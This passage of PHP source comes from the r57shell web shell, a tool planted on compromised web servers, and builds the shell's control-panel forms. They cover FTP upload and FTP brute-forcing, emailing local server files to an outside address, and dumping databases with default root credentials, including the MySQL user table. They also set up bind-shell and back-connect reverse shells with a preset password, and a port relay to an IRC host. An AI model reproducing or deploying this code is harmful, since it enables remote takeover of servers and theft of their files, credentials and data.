2219 echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2220 echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2221 echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2222 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2223 echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
2224 echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2225 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
2226 echo $te."</td>".$fe."</tr></div></table>";
2227 }
2228 if($unix && @function_exists("ftp_connect")){
2229 echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts;
2230 echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2231 echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
2232 echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
2233 echo $te.'</div>'.$table_end1.$fe;
2234 }
2235 if(@function_exists("mail")){
2236 echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2237 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
2238 echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("piero@kralpalace.org"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
2239 echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2240 echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
2241 echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
2242 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2243 echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2244 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
2245 echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("piero@kralpalace.org"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
2246 echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2247 echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
2248 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2249 echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
2250 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2251 echo $te."</td>".$fe."</tr></div></table>";
2252 }
2253 if($mysql_on||$mssql_on||$pg_on||$ora_on)
2254 {
2255 $select = '<select name=db>';
2256 if($mysql_on) $select .= '<option>MySQL</option>';
2257 if($mssql_on) $select .= '<option>MSSQL</option>';
2258 if($pg_on)    $select .= '<option>PostgreSQL</option>';
2259 if($ora_on)   $select .= '<option>Oracle</option>';
2260 $select .= '</select>';
2261 echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2262 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
2263 echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2264 echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2265 echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2266 echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
2267 echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
2268 echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
2269 echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2270 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
2271 echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2272 echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2273 echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2274 echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
2275 echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
2276 echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
2277 }
2278 if(!$safe_mode&&!$windows){
2279 echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
2280 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
2281 echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
2282 echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
2283 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2284 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
2285 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2286 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
2287 echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
2288 echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
2289 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2290 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
2291 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2292 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
2293 echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
2294 echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
2295 echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
2296 echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
2297 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
2298 echo $te."</td>".$fe."</tr></div></table>";
2299 }
2300 echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57.gen.tr v1.3- Thesaboarqe : R57<a href=http://www.r57.gen.tr/>www.r57.gen.tr/</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f;
2301 ?>